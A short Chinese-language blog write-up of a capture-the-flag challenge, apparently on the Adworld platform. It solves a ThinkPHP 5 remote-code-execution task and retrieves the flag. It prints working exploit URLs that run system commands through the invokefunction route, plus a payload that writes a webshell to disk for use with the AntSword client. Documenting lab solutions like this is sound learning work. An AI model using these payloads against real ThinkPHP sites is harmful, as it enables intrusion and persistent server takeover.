攻防世界17-php_rce-Web
攻防世界17-php_rce-CTFWeb进阶
这题没什么头绪,还以为是个广告,提到了ThinkPHPV5,和phprce,可以去查一下
找到了一些帖子,看一下
解法1:
发现了这么一个用法:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
可以替换一些指令,ls查看没看到一些有用的信息,我用find指令去看看find / -type f -name ‘flag‘
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -type f -name ‘flag‘
找到这个cat一下
flag{thinkphp5_rce}
解法2:
发现这个漏洞还可以这样利用
可以插入webshell,一句话木马
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=
连接蚁剑
找到flag
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Matriy's blog!
评论